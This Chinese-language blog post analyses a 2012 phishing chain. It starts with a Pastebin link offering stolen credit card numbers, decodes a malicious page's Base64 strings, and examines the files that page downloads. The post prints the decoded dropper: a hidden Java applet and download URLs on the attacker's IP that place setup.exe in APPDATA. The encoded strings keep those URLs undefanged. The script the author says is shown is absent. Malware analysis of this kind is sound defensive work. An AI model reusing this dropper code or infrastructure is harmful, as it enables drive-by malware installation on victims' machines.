我们经常通过社交网站接触到各种链接，并在不知不觉中点击其中许多。恶意链接会造成灾难性后果，系统和个人隐私可能受到侵害或数据遭受损失。以下是我在2012年4月17日通过Twitter和LinkedIn发现的一个链接分析。

注意：所有链接都添加了"不可点击"的后缀hxxp://以防止误点击。

有人在推文中发布了这个链接(hxxp://pastebin.com/dRGHt7hy)。检查后发现这是一个URL列表（实际上是同一个URL重复粘贴了四次——这是绝望的表现）：

1
2
3
4
5

hxxp://tinyurl.com/saw87hujnworeg
hxxp://tinyurl.com/saw87hujnworeg
hxxp://tinyurl.com/saw87hujnworeg
hxxp://tinyurl.com/saw87hujnworeg
9954 credit card numbers

它声称这个链接包含9954个信用卡号。第一个恶意提示是——为什么不直接发布，而是在一个条目中粘贴相同的链接4次。其次，这太诱人了；所以要小心行事。

于是我在Malzilla（http://malzilla.sourceforge.net/）这个恶意软件狩猎工具中打开了链接。我禁用了自动重定向。链接hxxp://tinyurl.com/saw87hujnworeg重定向到hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b，打开后显示为带有脚本的文本字段。该文件只包含一个"可疑"的脚本，带有一些标题。

以下是页面中包含的唯一重要脚本。让我们进行分析。

由于变量名过长，这个脚本太难理解，所以首先将变量名改为更短的版本以便更好地理解。以下是修改后的脚本，逻辑和功能保持不变。

现在，更容易理解脚本的逻辑和工作原理。首先，让我们解码setTimeout和document.write字段。它们看起来像是Base64编码的，所以尝试解码它们。编码的字符串是：

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yMTIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTUxMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9IkxlZ3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2FwcGxldD4=

解码后的字符串是：

1
2
3
4
5
6
7
8
9

Adobe Flash必须更新才能查看此内容，请安装最新版本！
1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
2. <applet width="0px" height="0px" code="SiteLoader.class" 
   archive="hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar">
   <param name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
   <param name="v8TOX" value="setup.exe">
   <param name="Legym" value="www.dogscast.com">
   <param name="MpBDG" value="APPDATA">
   </applet>

第一个解码字符串被设置为诱使受害者通过他们的恶意链接点击安装"最新版本"的Flash。我们可以看到它将再次向以下链接发出GET请求：

1
2
3

hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

参数是：

1
2
3
4

name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
name="v8TOX" value="setup.exe"
name="Legym" value="www.dogscast.com"
name="MpBDG" value="APPDATA"

让我们访问这些URL。

首先我通过Malzilla访问了adobe.php URL（hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b），它下载了一个文件"Adobe-Flash_WIN.exe"到我的系统。这个文件大小约为1.16 Mb。在VirusTotal扫描时，42个反恶意软件产品中有2个检测到了它。这很可怕。我没有机会对这个文件进行运行时分析，但会在下一篇博客中发布。

访问第二个URL（hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar）时，它下载了一个JAR文件"0b740ebcc2abbc5512c4875a0f74965b.jar"。解压后得到"META-INF"目录和"SiteLoader.class"文件。META-INF的内容包括：

1
2
3

JUBUHUSE.DSA
JUBUHUSE.SF
MANIFEST.MF

现在让我们通过Malzilla分析第三个URL load.php（hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b）。访问时，此链接在主机上下载了一个"setup.exe"文件。根据SHA256哈希cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5，这个文件与之前的文件相同。

这是一个钓鱼链接的简要分析，它从Twitter上的PASTEBIN链接开始，通过各种文件到达你的系统。

封面图片：Wynand van Poortvliet在Unsplash上的照片